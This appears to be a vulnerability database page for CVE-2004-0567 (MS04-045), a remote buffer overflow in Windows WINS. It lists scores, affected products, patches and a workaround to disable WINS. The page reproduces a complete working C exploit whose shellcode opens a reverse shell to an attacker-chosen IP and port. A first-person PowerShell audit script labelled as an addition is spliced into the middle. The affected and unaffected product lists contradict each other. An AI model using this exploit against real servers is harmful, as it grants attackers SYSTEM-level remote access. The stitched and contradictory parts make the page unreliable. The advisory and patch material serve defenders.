CVE-2004-0567
CVSS 7.5
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:38:46

[原文]The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server 2003 does not properly validate the computer name value in a WINS packet, which allows remote attackers to execute arbitrary code or cause a denial of service (server crash), which results in an "unchecked buffer" and possibly triggers a buffer overflow, aka the "Name Validation Vulnerability."


[CNNVD] Microsoft WINS Service Remote Buffer Overflow Vulnerability (MS04-045) (CNNVD-200412-292)

Microsoft Windows WINS is Microsoft's NetBIOS name service, used to resolve NetBIOS computer names to IP addresses.
Microsoft Windows WINS has a flaw in validating associated content; a remote attacker can exploit this vulnerability to execute arbitrary instructions with the privileges of the system process.
Because name validation lacks sufficient checks, an attacker can construct a malicious network packet that triggers a buffer overflow; carefully crafted data may execute arbitrary instructions with system-process privileges. On Windows Server 2003, currently only a denial of service appears to be possible.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_2000::sp3:server  Microsoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp4:server  Microsoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2003_server:64-bit
cpe:/o:microsoft:windows_nt:4.0:sp6a:server  Microsoft Windows 4.0 sp6a server

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0567
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0567
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-292
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/378160
(VENDOR_ADVISORY)  CERT-VN  VU#378160
http://xforce.iss.net/xforce/xfdb/18259
(PATCH)  XF  wins-memory-pointer-hijack(18259)
http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx
(VENDOR_ADVISORY)  MS  MS04-045
http://www.ciac.org/ciac/bulletins/p-054.shtml
(VENDOR_ADVISORY)  CIAC  P-054
http://www.securityfocus.com/bid/11922
(UNKNOWN)  BID  11922
http://www.osvdb.org/12370
(UNKNOWN)  OSVDB  12370
http://securitytracker.com/id?1012517
(UNKNOWN)  SECTRACK  1012517
http://secunia.com/advisories/13466
(UNKNOWN)  SECUNIA  13466

- Vulnerability information

Microsoft WINS Service Remote Buffer Overflow Vulnerability (MS04-045)
High risk  Boundary condition error
2004-12-31 00:00:00 2006-04-19 00:00:00
Remote

Microsoft Windows WINS is Microsoft's NetBIOS name service, used to resolve NetBIOS computer names to IP addresses.
Microsoft Windows WINS has a flaw in validating associated content; a remote attacker can exploit this vulnerability to execute arbitrary instructions with the privileges of the system process.
Because name validation lacks sufficient checks, an attacker can construct a malicious network packet that triggers a buffer overflow; carefully crafted data may execute arbitrary instructions with system-process privileges. On Windows Server 2003, currently only a denial of service appears to be possible.

- Advisories and patches

Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS04-045) and corresponding patches for this issue:
MS04-045: Vulnerability in WINS Could Allow Remote Code Execution (870763)
Link:
http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx

Patch downloads:
Microsoft Windows NT Server 4.0 Service Pack 6a
http://www.microsoft.com/downloads/details.aspx?FamilyId=38E9DB8C-5C43-4E9A-9DC9-97C2686A45F1

Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6
http://www.microsoft.com/downloads/details.aspx?FamilyId=D7AB3F6F-26FE-4AE8-A07A-481D772D03A6

Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?FamilyId=40146B52-5546-489E-857E-01FE1EF709B2

Microsoft Windows Server 2003
http://www.microsoft.com/downloads/details.aspx?FamilyId=10836F38-A38B-47D5-B87B-18D8E26EEFAA

Microsoft Windows Server 2003 64-Bit Edition
http://www.microsoft.com/downloads/details.aspx?FamilyId=06CF9E85-C66D-4A7D-B2EB-99DE9423B60F

- Vulnerability information (733)

MS Windows 2000 WINS Remote Code Execution Exploit (EDBID:733)
windows remote
2004-12-31 Verified
42 zuc
N/A
/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit                                     */
/* Exploit by: zuc <zuc@hack.it>              		                         */ 
/* works on Windows 2000 SP3/SP4 probably every language                  */
/*************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

	char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"
//  "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\x3c\x01\x02\x03\x04"
	
"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05";
char rep[] =
	
"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4e\x05\x90\x00\x4e\x05";
void usage();

int main(int argc, char *argv[])
{ 
int i,sock,sock2,sock3,addr,len=16;
int rc;
  unsigned long XORIP = 0x93939393;
  unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
	memcpy(mess3+le,rep,sizeof(rep)-1);
	le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode));
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{ 
//printf("socket() error...\n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct 
sockaddr_in));
printf("[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("[*] exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

// milw0rm.com [2004-12-31]
		

- Vulnerability information

12370
Microsoft Windows WINS Computer Name Validation Remote Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

A remote overflow exists in Microsoft Windows. WINS fails to perform proper bounds checking on the 'name' parameter on incoming WINS packets resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2004-12-14 Unknown
2005-01-02 Unknown

- Solution

Microsoft has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround: disable the WINS service.
1. Control Panel -> "Add or Remove Programs"
2. "Components" -> "Networking Services" -> "Details"
3. Clear the box next to "Windows Internet Naming Service (WINS)"
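As an added defender-side check (not part of this record, the vendor bulletin or any tool it names), the following Windows PowerShell function audits hosts for the two conditions the advisory and workaround describe: whether the WINS service is present and running (and TCP port 42 reachable), and whether update 870763 from MS04-045 is installed. It assumes Windows PowerShell 5.1 on a management host with administrative rights on the targets; the function name, output fields and the host names in the usage line are my own.

```powershell
# Added example, not part of the CVE record. Audits hosts for MS04-045 exposure:
# WINS service state, TCP/42 reachability, and presence of the KB870763 update
# named in the bulletin. Assumes Windows PowerShell 5.1 (Get-Service/Get-HotFix
# support -ComputerName there) and admin rights on each target.
function Get-WinsExposure {
    param([string[]]$ComputerName = @($env:COMPUTERNAME))

    foreach ($c in $ComputerName) {
        # WINS is an optional component; no service at all is the safest state.
        $svc = Get-Service -Name 'WINS' -ComputerName $c -ErrorAction SilentlyContinue
        # Get-HotFix reports a non-terminating error when the update is absent,
        # so a $null result means "KB870763 not installed".
        $fix = Get-HotFix -Id 'KB870763' -ComputerName $c -ErrorAction SilentlyContinue
        # WINS replication listens on TCP 42; a reachable port means network exposure.
        $tcp = Test-NetConnection -ComputerName $c -Port 42 -WarningAction SilentlyContinue

        $running = ($null -ne $svc) -and ($svc.Status -eq 'Running')
        $patched = ($null -ne $fix)
        $exposed = $running -or [bool]$tcp.TcpTestSucceeded

        # Running and unpatched is exactly the condition the advisory describes.
        $risk = 'High (WINS exposed, KB870763 not found)'
        if ($patched)      { $risk = 'Patched (KB870763 installed)' }
        if (-not $exposed) { $risk = 'None (WINS not running, TCP/42 closed)' }

        [pscustomobject]@{
            ComputerName    = $c
            WinsInstalled   = ($null -ne $svc)
            WinsStatus      = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
            Tcp42Reachable  = [bool]$tcp.TcpTestSucceeded
            KB870763Present = $patched
            Risk            = $risk
        }
    }
}

# Usage: audit two (constructed) host names and show the result as a table.
Get-WinsExposure -ComputerName 'wins01', 'wins02' | Format-Table -AutoSize
```

Test-NetConnection requires Windows 8.1 / Server 2012 R2 or later on the management host; the audited hosts only need WMI reachable for Get-Service and Get-HotFix.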

- References

- Vulnerability author

- Vulnerability information

Microsoft Windows WINS Name Value Handling Remote Buffer Overflow Vulnerability
Boundary Condition Error 11922
Yes No
2004-12-14 12:00:00 2007-11-01 05:06:00
This vulnerability was reported to Microsoft by Kostya Kortchinsky.

- Affected program versions

Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98 SP1
Microsoft Windows 98
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3

- Unaffected program versions

Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98 SP1
Microsoft Windows 98
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3

- Vulnerability discussion

The WINS server contains a buffer-overflow vulnerability that can allow attackers to corrupt WINS process memory. The issue occurs because the software fails to perform sufficient boundary checks on computer 'name' data that is handled during a WINS transaction.

Ultimately, a WINS client may exploit this issue remotely to execute arbitrary code with SYSTEM-level privileges on a target WINS server. The service may be exposed via TCP/UDP port 42 by default, but the vendor has stated that other attack vectors may exist (though none are known at this time).

- Exploit

An exploit has been released as part of the MetaSploit Framework 2.3.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

Microsoft has released updates to address this vulnerability in supported versions of the Windows operating system.

Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows 2000 Server SP3
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows 2000 Server SP4
Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites